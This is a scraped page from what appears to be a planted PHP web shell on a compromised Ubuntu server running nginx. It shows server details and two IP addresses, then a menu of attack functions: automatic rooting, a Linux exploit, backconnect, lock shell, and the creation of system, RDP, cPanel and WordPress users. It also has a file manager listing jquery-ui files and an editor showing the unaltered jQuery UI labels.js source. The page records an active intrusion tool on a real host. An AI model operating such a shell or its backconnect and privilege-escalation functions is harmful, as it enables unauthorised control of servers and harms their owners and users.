Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
javascript /
jquery-ui /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
effects
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
core.js
361
B
-rw-r--r--
core.min.js
257
B
-rw-r--r--
data.js
934
B
-rw-r--r--
data.min.js
360
B
-rw-r--r--
disable-selection.js
1.05
KB
-rw-r--r--
disable-selection.min.js
461
B
-rw-r--r--
effect.js
24.04
KB
-rw-r--r--
effect.min.js
13.71
KB
-rw-r--r--
focusable.js
2.24
KB
-rw-r--r--
focusable.min.js
1.08
KB
-rw-r--r--
form-reset-mixin.js
1.78
KB
-rw-r--r--
form-reset-mixin.min.js
959
B
-rw-r--r--
form.js
581
B
-rw-r--r--
form.min.js
256
B
-rw-r--r--
ie.js
385
B
-rw-r--r--
ie.min.js
224
B
-rw-r--r--
jquery-patch.js
2.12
KB
-rw-r--r--
jquery-patch.min.js
725
B
-rw-r--r--
jquery-var-for-color.js
530
B
-rw-r--r--
jquery-var-for-color.min.js
141
B
-rw-r--r--
keycode.js
820
B
-rw-r--r--
keycode.min.js
322
B
-rw-r--r--
labels.js
1.73
KB
-rw-r--r--
labels.min.js
586
B
-rw-r--r--
plugin.js
1020
B
-rw-r--r--
plugin.min.js
617
B
-rw-r--r--
position.js
14.77
KB
-rw-r--r--
position.min.js
9.47
KB
-rw-r--r--
safe-active-element.js
1014
B
-rw-r--r--
safe-active-element.min.js
406
B
-rw-r--r--
safe-blur.js
523
B
-rw-r--r--
safe-blur.min.js
270
B
-rw-r--r--
scroll-parent.js
1.25
KB
-rw-r--r--
scroll-parent.min.js
674
B
-rw-r--r--
tabbable.js
883
B
-rw-r--r--
tabbable.min.js
367
B
-rw-r--r--
unique-id.js
976
B
-rw-r--r--
unique-id.min.js
391
B
-rw-r--r--
version.js
322
B
-rw-r--r--
version.min.js
184
B
-rw-r--r--
widget.js
19.81
KB
-rw-r--r--
widget.min.js
11.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : labels.js
/*! * jQuery UI Labels 1.13.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ //>>label: labels //>>group: Core //>>description: Find all the labels associated with a given input //>>docs: http://api.jqueryui.com/labels/ ( function( factory ) { "use strict"; if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "./version" ], factory ); } else { // Browser globals factory( jQuery ); } } )( function( $ ) { "use strict"; return $.fn.labels = function() { var ancestor, selector, id, labels, ancestors; if ( !this.length ) { return this.pushStack( [] ); } // Check control.labels first if ( this[ 0 ].labels && this[ 0 ].labels.length ) { return this.pushStack( this[ 0 ].labels ); } // Support: IE <= 11, FF <= 37, Android <= 2.3 only // Above browsers do not support control.labels. Everything below is to support them // as well as document fragments. control.labels does not work on document fragments labels = this.eq( 0 ).parents( "label" ); // Look for the label based on the id id = this.attr( "id" ); if ( id ) { // We don't search against the document in case the element // is disconnected from the DOM ancestor = this.eq( 0 ).parents().last(); // Get a full set of top level ancestors ancestors = ancestor.add( ancestor.length ? ancestor.siblings() : this.siblings() ); // Create a selector for the label based on the id selector = "label[for='" + $.escapeSelector( id ) + "']"; labels = labels.add( ancestors.find( selector ).addBack( selector ) ); } // Return whatever we have found for labels return this.pushStack( labels ); }; } );
Close